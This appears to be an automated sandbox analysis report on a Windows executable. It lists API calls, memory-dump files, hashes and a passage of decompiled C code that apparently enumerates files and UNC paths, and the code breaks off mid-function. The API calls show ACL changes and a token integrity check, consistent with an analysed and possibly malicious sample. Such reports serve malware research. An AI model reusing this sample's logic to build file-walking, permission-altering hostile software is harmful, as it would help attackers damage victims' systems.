                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 3919263394-0
                                                                    • Opcode ID: 9b30fe1dcbaf85fdfd0630d47c531afc2823990d5aea52e60b58c1590db4b843
                                                                    • Instruction ID: 5d05fdbd47c82d44b5ff40f033fd7fc8d176e459a3f0b62b1ceda0caddc7f677
                                                                    • Opcode Fuzzy Hash: 9b30fe1dcbaf85fdfd0630d47c531afc2823990d5aea52e60b58c1590db4b843
                                                                    • Instruction Fuzzy Hash: FB218B71A04618EFDB20DF55CC45FEEB7B8EB08711F100229E921B72C0D7756A09CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00E59CB6
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000006,00000001,00000000), ref: 00E59CD3
                                                                    • FlushFileBuffers.KERNEL32(00000000), ref: 00E59CDA
                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00E59CE1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$BuffersChangeCloseCreateFindFlushNotificationWrite
                                                                    • String ID:
                                                                    • API String ID: 2906694865-0
                                                                    • Opcode ID: e9c19a9527177aa84bd7f4fd07ddf9d0a9e9db1e7a147ee676bcfbd7f07191f6
                                                                    • Instruction ID: a2451f2cf1155b380d181432c0e6a3221fe850c02bc9005e3262ee05e3ccd198
                                                                    • Opcode Fuzzy Hash: e9c19a9527177aa84bd7f4fd07ddf9d0a9e9db1e7a147ee676bcfbd7f07191f6
                                                                    • Instruction Fuzzy Hash: E7119D71A04218AFCB10DF69CC48FDEBBB8EB09720F104229F915B72C0D7756A09CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WriteFile.KERNELBASE(--------------------------------,00000000,00000000,00000000), ref: 00E59FC0
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E59FDF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileMtx_unlockWrite
                                                                    • String ID: --------------------------------
                                                                    • API String ID: 2331889646-1561565162
                                                                    • Opcode ID: e3749267c37ecdc2270b9f2acafb8456e73d95ac3f3f3d9ecc98150de3eb5c45
                                                                    • Instruction ID: abd90d28014f34dc10ba966fff76f0a311d42a682433d062deeaa45de29deb32
                                                                    • Opcode Fuzzy Hash: e3749267c37ecdc2270b9f2acafb8456e73d95ac3f3f3d9ecc98150de3eb5c45
                                                                    • Instruction Fuzzy Hash: 55312976A00205DFCB14DF64DD42BBA77B8EF45704F08466DEC06EB391EB71AA09C6A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000001,00000000,00000000,00000000,00000000), ref: 00E86F54
                                                                    • SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?), ref: 00E86F97
                                                                    • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,00000000,00000000), ref: 00E86FAB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoNamedSecurity$Entries
                                                                    • String ID:
                                                                    • API String ID: 2731562941-0
                                                                    • Opcode ID: 33908b032aea22440d66c4ee2a4cc5795987f505ac6f601c8a896f41967a36d3
                                                                    • Instruction ID: b4c9a48e320905f39b5f487f3739e77cae20d02ecdc93e320f8c152a0a3e3034
                                                                    • Opcode Fuzzy Hash: 33908b032aea22440d66c4ee2a4cc5795987f505ac6f601c8a896f41967a36d3
                                                                    • Instruction Fuzzy Hash: A5010C70A45308AFEB20DF95DC46FEDBBB9EB08714F500158F6007A2C0C7F669458B98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • OpenProcessToken.ADVAPI32(00000008,?), ref: 00E58286
                                                                    • GetTokenInformation.KERNELBASE(000CC123,00000001(TokenIntegrityLevel),00000000,00000064,?), ref: 00E582AF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Token$InformationOpenProcess
                                                                    • String ID:
                                                                    • API String ID: 1620003723-0
                                                                    • Opcode ID: 280762373edab77764f7fdf4b6705cc54f937f0b2b97aa517136d734a735cb79
                                                                    • Instruction ID: 974a5568d301f3aea585f9fb8621373d965c057dc637e219bd7739e7b0468c23
                                                                    • Opcode Fuzzy Hash: 280762373edab77764f7fdf4b6705cc54f937f0b2b97aa517136d734a735cb79
                                                                    • Instruction Fuzzy Hash: 0D21F835901108ABD7209FA4DC41EAF7BB5EF49310F000569ED05BB351DB756A19CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::locale::_Init.LIBCPMT ref: 00E736F5
                                                                      • Part of subcall function 00EA6294: __EH_prolog3.LIBCMT ref: 00EA629B
                                                                      • Part of subcall function 00EA6294: std::_Lockit::_Lockit.LIBCPMT ref: 00EA62A6
                                                                      • Part of subcall function 00EA6294: std::locale::_Setgloballocale.LIBCPMT ref: 00EA62C1
                                                                      • Part of subcall function 00EA6294: _Yarn.LIBCPMT ref: 00EA62D7
                                                                      • Part of subcall function 00EA6294: std::_Lockit::~_Lockit.LIBCPMT ref: 00EA6317
                                                                      • Part of subcall function 00E81E60: std::_Lockit::_Lockit.LIBCPMT ref: 00E81EB0
                                                                      • Part of subcall function 00E81E60: std::_Lockit::_Lockit.LIBCPMT ref: 00E81ED2
                                                                      • Part of subcall function 00E81E60: std::_Lockit::~_Lockit.LIBCPMT ref: 00E81EFA
                                                                      • Part of subcall function 00E81E60: std::_Lockit::~_Lockit.LIBCPMT ref: 00E82034
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::locale::_$H_prolog3InitSetgloballocaleYarn
                                                                    • String ID:
                                                                    • API String ID: 3401496928-0
                                                                    • Opcode ID: 0bea90aa22c9a58898b599bc9688748bcc15af3a7fd044dbefd24d647ac15948
                                                                    • Instruction ID: e6c6c17886ccd464d1f778d357bd9717e3a52af0928580a375865c8f2862657b
                                                                    • Opcode Fuzzy Hash: 0bea90aa22c9a58898b599bc9688748bcc15af3a7fd044dbefd24d647ac15948
                                                                    • Instruction Fuzzy Hash: 49514FB5A002048FDB04DF58C895B5ABBF5FF48724F24819DE805AF382D776A945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 740a173153d881afccbc4313a2e8680ea4e1b5e535a6e3eef1adde99f0254408
                                                                    • Instruction ID: eb1e4610c70ba78641f2a99c199e14f58f3a931b681b2d9f42a9d6d94404f31b
                                                                    • Opcode Fuzzy Hash: 740a173153d881afccbc4313a2e8680ea4e1b5e535a6e3eef1adde99f0254408
                                                                    • Instruction Fuzzy Hash: FD315876A00614DF8B15DF6AC48189AB7F2FF8932072686A5E525FB360C730AE05CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5925671aadc92387ddfbf036150e1219739bdc6207cf3fcdf691b4d46f73683d
                                                                    • Instruction ID: 04f3e936da846db2f1b515fc586e67aa17317eaa45d5f54389a554617bbe66e0
                                                                    • Opcode Fuzzy Hash: 5925671aadc92387ddfbf036150e1219739bdc6207cf3fcdf691b4d46f73683d
                                                                    • Instruction Fuzzy Hash: FF01F537604B159F9B169E6EEC80ADB7B97ABC53347159220FA04EB195DA31D8028B90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E73A14
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_task
                                                                    • String ID:
                                                                    • API String ID: 118556049-0
                                                                    • Opcode ID: c7237130555e5ab051c6a2a9d54ac3074c68c8f9d84607f77b3fb2968a15d97d
                                                                    • Instruction ID: 81f6daea9615051d91ea4ef873958db6ed269cc553c845df6e9f85a74baee7d2
                                                                    • Opcode Fuzzy Hash: c7237130555e5ab051c6a2a9d54ac3074c68c8f9d84607f77b3fb2968a15d97d
                                                                    • Instruction Fuzzy Hash: D7F02E7210010809E718E7749947E1E73E9CF903547449536E44DEB513FB31EA54D165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00EA8D0C,?,?,000000FF,?,?,00E820BF,?,?), ref: 00EB64CE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: a808d25671ec05c51a88a56ae0478170a2bf2415be745ffb9246d5da664a30df
                                                                    • Instruction ID: 959220ced044d4d5ccf852a78b7c9abb6a5f30825396325984d9f75d621736e2
                                                                    • Opcode Fuzzy Hash: a808d25671ec05c51a88a56ae0478170a2bf2415be745ffb9246d5da664a30df
                                                                    • Instruction Fuzzy Hash: 41E0ED32500A2056EA303A66DC00BDF3A88BF027B8F142120ED29B66A0CB28CC0186E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(?,?,00EA6439,00EA6480,?,00EA62C6,00000000,00000000,00000000,00000004,00E735BB,00000001,00000008,?,?,?), ref: 00EA7364
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: f1ac82e4ac3bf3f560fa80422b2bf17fdc41bf9aa52981635d11d5312b9362c8
                                                                    • Instruction ID: cbac4f0ca83ec0b2061d3d4ee9ee989b997368b4cc28a68d95c1259e1b2f31bb
                                                                    • Opcode Fuzzy Hash: f1ac82e4ac3bf3f560fa80422b2bf17fdc41bf9aa52981635d11d5312b9362c8
                                                                    • Instruction Fuzzy Hash: 22D09270008A8CDFCB699F6AFD946553BA8E304346B408038F808A62B2C7B25469CF68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 75%
                                                                    			E00E665E0(void* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
                                                                    				intOrPtr _v8;
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				char _v24;
                                                                    				intOrPtr _v28;
                                                                    				signed int _v32;
                                                                    				char _v33;
                                                                    				signed int _v40;
                                                                    				signed int _v44;
                                                                    				signed int _v48;
                                                                    				signed int _v52;
                                                                    				signed int _v56;
                                                                    				signed int _v60;
                                                                    				signed int _v64;
                                                                    				signed int _v68;
                                                                    				signed int _v72;
                                                                    				char _v76;
                                                                    				signed int _v80;
                                                                    				signed int _v84;
                                                                    				signed int _v88;
                                                                    				long _v92;
                                                                    				intOrPtr _v96;
                                                                    				char _v108;
                                                                    				signed int _v112;
                                                                    				signed int _v116;
                                                                    				signed int _v120;
                                                                    				signed int _v124;
                                                                    				signed int _v128;
                                                                    				signed int _v132;
                                                                    				signed int _v136;
                                                                    				signed int _v140;
                                                                    				signed int _v144;
                                                                    				char _v148;
                                                                    				intOrPtr _v152;
                                                                    				signed int _v156;
                                                                    				char _v172;
                                                                    				signed int _v176;
                                                                    				signed int _v180;
                                                                    				signed int _v184;
                                                                    				signed int _v188;
                                                                    				signed int _v192;
                                                                    				signed int* _v200;
                                                                    				char _v228;
                                                                    				signed int _v232;
                                                                    				intOrPtr _v236;
                                                                    				intOrPtr _v240;
                                                                    				signed int _v244;
                                                                    				long _v252;
                                                                    				struct _WIN32_FIND_DATAW _v844;
                                                                    				signed int _v848;
                                                                    				signed int _v852;
                                                                    				signed int _v856;
                                                                    				signed int _v860;
                                                                    				signed int _v864;
                                                                    				signed int _v868;
                                                                    				signed int _v872;
                                                                    				signed int _v876;
                                                                    				signed int _v880;
                                                                    				void* _v884;
                                                                    				signed int _v888;
                                                                    				signed int _v892;
                                                                    				signed int _v896;
                                                                    				signed int _v900;
                                                                    				signed int _v904;
                                                                    				signed int _v908;
                                                                    				signed int _v912;
                                                                    				signed int _v916;
                                                                    				signed int _v920;
                                                                    				signed int _v924;
                                                                    				signed int _v928;
                                                                    				signed int _v932;
                                                                    				char _v936;
                                                                    				signed int _v940;
                                                                    				signed int _v944;
                                                                    				signed int _v948;
                                                                    				char _v952;
                                                                    				char _v956;
                                                                    				char _v960;
                                                                    				char _v964;
                                                                    				signed int _v968;
                                                                    				signed int _v972;
                                                                    				signed int _v976;
                                                                    				signed int* _v980;
                                                                    				signed int _v984;
                                                                    				signed int* _v988;
                                                                    				signed int _v992;
                                                                    				char* _v1000;
                                                                    				char* _v1004;
                                                                    				signed int* _v1008;
                                                                    				signed int* _v1012;
                                                                    				void* _v1016;
                                                                    				signed int* _v1020;
                                                                    				intOrPtr _v1024;
                                                                    				intOrPtr _v1028;
                                                                    				char _v1052;
                                                                    				char _v1076;
                                                                    				char _v1100;
                                                                    				char _v1124;
                                                                    				char _v1148;
                                                                    				char _v1172;
                                                                    				char _v1196;
                                                                    				char _v1220;
                                                                    				char _v1244;
                                                                    				char _v1268;
                                                                    				char _v1292;
                                                                    				char _v1316;
                                                                    				char _v1340;
                                                                    				char _v1376;
                                                                    				signed int _v1380;
                                                                    				void* __ebp;
                                                                    				signed int _t873;
                                                                    				signed int _t874;
                                                                    				intOrPtr _t876;
                                                                    				intOrPtr _t877;
                                                                    				void* _t880;
                                                                    				void* _t881;
                                                                    				signed int _t882;
                                                                    				intOrPtr* _t884;
                                                                    				void* _t889;
                                                                    				void* _t892;
                                                                    				signed int _t896;
                                                                    				void* _t899;
                                                                    				signed int _t901;
                                                                    				signed int _t903;
                                                                    				signed int _t904;
                                                                    				signed int _t905;
                                                                    				signed int _t910;
                                                                    				signed int _t912;
                                                                    				signed int _t916;
                                                                    				signed int _t917;
                                                                    				signed int _t925;
                                                                    				signed int _t927;
                                                                    				signed int _t929;
                                                                    				signed int _t931;
                                                                    				intOrPtr _t936;
                                                                    				intOrPtr* _t942;
                                                                    				void* _t943;
                                                                    				signed int _t947;
                                                                    				signed int _t955;
                                                                    				signed int _t957;
                                                                    				long _t959;
                                                                    				signed int _t962;
                                                                    				intOrPtr _t965;
                                                                    				signed int _t967;
                                                                    				intOrPtr _t970;
                                                                    				intOrPtr _t978;
                                                                    				signed int _t994;
                                                                    				signed int _t996;
                                                                    				signed int _t998;
                                                                    				signed int _t1002;
                                                                    				signed int* _t1017;
                                                                    				signed int* _t1018;
                                                                    				signed int _t1026;
                                                                    				intOrPtr* _t1031;
                                                                    				signed int _t1037;
                                                                    				signed int _t1038;
                                                                    				signed int _t1039;
                                                                    				signed int _t1040;
                                                                    				signed int _t1041;
                                                                    				signed int _t1042;
                                                                    				signed int _t1043;
                                                                    				signed int _t1044;
                                                                    				signed int _t1046;
                                                                    				signed int _t1047;
                                                                    				signed int _t1048;
                                                                    				signed int _t1060;
                                                                    				signed int _t1062;
                                                                    				intOrPtr _t1063;
                                                                    				intOrPtr _t1065;
                                                                    				signed int _t1067;
                                                                    				intOrPtr _t1069;
                                                                    				signed int _t1071;
                                                                    				intOrPtr _t1078;
                                                                    				signed int _t1080;
                                                                    				intOrPtr _t1082;
                                                                    				intOrPtr _t1089;
                                                                    				signed int _t1091;
                                                                    				intOrPtr _t1093;
                                                                    				intOrPtr _t1100;
                                                                    				signed int _t1102;
                                                                    				intOrPtr _t1104;
                                                                    				intOrPtr _t1110;
                                                                    				signed int _t1112;
                                                                    				intOrPtr _t1114;
                                                                    				void* _t1121;
                                                                    				void* _t1122;
                                                                    				intOrPtr* _t1123;
                                                                    				signed int _t1128;
                                                                    				signed int _t1129;
                                                                    				signed int _t1130;
                                                                    				signed int _t1131;
                                                                    				signed int _t1132;
                                                                    				intOrPtr* _t1136;
                                                                    				intOrPtr* _t1143;
                                                                    				void* _t1155;
                                                                    				intOrPtr* _t1156;
                                                                    				WCHAR* _t1160;
                                                                    				WCHAR* _t1164;
                                                                    				long _t1165;
                                                                    				WCHAR* _t1167;
                                                                    				long _t1168;
                                                                    				WCHAR* _t1170;
                                                                    				long _t1171;
                                                                    				WCHAR* _t1173;
                                                                    				long _t1174;
                                                                    				signed int* _t1178;
                                                                    				signed int* _t1208;
                                                                    				signed int _t1216;
                                                                    				signed int* _t1222;
                                                                    				signed int* _t1239;
                                                                    				signed int* _t1243;
                                                                    				signed int _t1245;
                                                                    				signed int _t1247;
                                                                    				signed int _t1249;
                                                                    				signed int _t1250;
                                                                    				signed int _t1252;
                                                                    				signed int _t1253;
                                                                    				signed int _t1254;
                                                                    				signed int _t1255;
                                                                    				signed int _t1260;
                                                                    				signed int _t1261;
                                                                    				signed int _t1266;
                                                                    				intOrPtr _t1267;
                                                                    				intOrPtr _t1269;
                                                                    				intOrPtr _t1277;
                                                                    				intOrPtr* _t1282;
                                                                    				void* _t1286;
                                                                    				void* _t1311;
                                                                    				signed int _t1316;
                                                                    				signed int _t1348;
                                                                    				intOrPtr* _t1354;
                                                                    				signed int _t1356;
                                                                    				signed int _t1367;
                                                                    				char* _t1391;
                                                                    				signed int _t1392;
                                                                    				signed int _t1395;
                                                                    				signed int* _t1447;
                                                                    				char _t1449;
                                                                    				signed int _t1452;
                                                                    				intOrPtr* _t1453;
                                                                    				long _t1466;
                                                                    				signed int _t1477;
                                                                    				signed int _t1479;
                                                                    				short* _t1480;
                                                                    				signed int _t1483;
                                                                    				signed int _t1488;
                                                                    				signed int _t1490;
                                                                    				signed int _t1500;
                                                                    				signed int _t1502;
                                                                    				signed int _t1503;
                                                                    				intOrPtr* _t1504;
                                                                    				signed int _t1505;
                                                                    				signed int _t1506;
                                                                    				signed int _t1507;
                                                                    				signed int _t1509;
                                                                    				signed int _t1510;
                                                                    				void* _t1512;
                                                                    				signed int _t1518;
                                                                    				signed int* _t1519;
                                                                    				signed int _t1520;
                                                                    				signed int* _t1521;
                                                                    				intOrPtr* _t1522;
                                                                    				signed int _t1523;
                                                                    				signed int _t1524;
                                                                    				signed int _t1526;
                                                                    				signed int _t1527;
                                                                    				signed int* _t1535;
                                                                    				intOrPtr _t1537;
                                                                    				signed int _t1538;
                                                                    				signed int _t1539;
                                                                    				signed int _t1541;
                                                                    				signed int _t1543;
                                                                    				short* _t1548;
                                                                    				signed int* _t1549;
                                                                    				signed int* _t1550;
                                                                    				signed int _t1551;
                                                                    				signed int _t1552;
                                                                    				signed int* _t1553;
                                                                    				signed int _t1554;
                                                                    				signed int _t1555;
                                                                    				signed int* _t1556;
                                                                    				signed int* _t1557;
                                                                    				signed int _t1558;
                                                                    				signed int _t1561;
                                                                    				signed int _t1564;
                                                                    				signed int _t1566;
                                                                    				signed int _t1569;
                                                                    				signed int _t1570;
                                                                    				void* _t1573;
                                                                    				signed int _t1576;
                                                                    				signed int _t1577;
                                                                    				void* _t1578;
                                                                    				void* _t1579;
                                                                    				void* _t1580;
                                                                    				void* _t1581;
                                                                    				void* _t1582;
                                                                    				void* _t1583;
                                                                    				void* _t1584;
                                                                    				signed int _t1586;
                                                                    				void* _t1588;
                                                                    				void* _t1589;
                                                                    				void* _t1596;
                                                                    				void* _t1599;
                                                                    				void* _t1601;
                                                                    				void* _t1602;
                                                                    				void* _t1603;
                                                                    				void* _t1604;
                                                                    				void* _t1605;
                                                                    				void* _t1606;
                                                                    				void* _t1608;
                                                                    				void* _t1612;
                                                                    				void* _t1613;
                                                                    				void* _t1614;
                                                                    				void* _t1616;
                                                                    				void* _t1638;
                                                                    				void* _t1641;
                                                                    				void* _t1644;
                                                                    				void* _t1647;
                                                                    				void* _t1651;
                                                                    				void* _t1652;
                                                                    				void* _t1653;
                                                                    				void* _t1654;
                                                                    				void* _t1655;
                                                                    
                                                                    				_t1528 = __esi;
                                                                    				_t1459 = __edx;
                                                                    				_push(__ebx);
                                                                    				_t1286 = _t1573;
                                                                    				_t1576 = (_t1573 - 0x00000008 & 0xfffffff8) + 4;
                                                                    				_v8 =  *((intOrPtr*)(_t1286 + 4));
                                                                    				_t1569 = _t1576;
                                                                    				_push(0xffffffff);
                                                                    				_push(0xec7276);
                                                                    				_push( *[fs:0x0]);
                                                                    				_push(_t1286);
                                                                    				_t1577 = _t1576 - 0x520;
                                                                    				_t873 =  *0xeef074; // 0x2b749d79
                                                                    				_t874 = _t873 ^ _t1569;
                                                                    				_v32 = _t874;
                                                                    				_push(__esi);
                                                                    				_push(__edi);
                                                                    				_push(_t874);
                                                                    				 *[fs:0x0] =  &_v24;
                                                                    				_v948 = __edx;
                                                                    				_v40 = __ecx;
                                                                    				_v864 = 0;
                                                                    				_v16 = 0;
                                                                    				_t1502 = 0;
                                                                    				_t876 =  *0xf2c0a4; // 0x0
                                                                    				if(_t876 >= _v40) {
                                                                    					L8:
                                                                    					_t877 =  *0xf2c0a4; // 0x0
                                                                    					_t1627 = _t877 - _v40;
                                                                    					if(_t877 != _v40) {
                                                                    						L68:
                                                                    						_push(0xffffffff);
                                                                    						E00E59040(_t1286, _t1286 + 8,  &_v112, 4);
                                                                    						_v16 = 0x14;
                                                                    						_t1529 = _v92;
                                                                    						_t1503 = _v112;
                                                                    						_t1293 =  >=  ? _t1503 :  &_v112;
                                                                    						_t880 = E00E591D0( >=  ? _t1503 :  &_v112, _v96,  >=  ? _t1503 :  &_v112, ":", 1);
                                                                    						_t1578 = _t1577 + 0xc;
                                                                    						if(_t880 == 0xffffffff) {
                                                                    							__eflags = _t1529 - 8;
                                                                    							_t1295 =  >=  ? _t1503 :  &_v112;
                                                                    							_t881 = E00E591D0( >=  ? _t1503 :  &_v112, _v96,  >=  ? _t1503 :  &_v112, L"UNC\\", 4);
                                                                    							_t1579 = _t1578 + 0xc;
                                                                    							__eflags = _t881 - 0xffffffff;
                                                                    							if(_t881 != 0xffffffff) {
                                                                    								_push(0xffffffff);
                                                                    								_t1548 = E00E59040(_t1286,  &_v112,  &_v1052, 4);
                                                                    								_v16 = 0x16;
                                                                    								_t1178 =  &_v112;
                                                                    								__eflags = _t1178 - _t1548;
                                                                    								if(_t1178 != _t1548) {
                                                                    									E00E59AF0(_t1286, _t1178, _t1503);
                                                                    									asm("movups xmm0, [esi]");
                                                                    									__eflags = 0;
                                                                    									asm("movups [ebp-0x64], xmm0");
                                                                    									asm("movq xmm0, [esi+0x10]");
                                                                    									asm("movq [ebp-0x54], xmm0");
                                                                    									 *(_t1548 + 0x10) = 0;
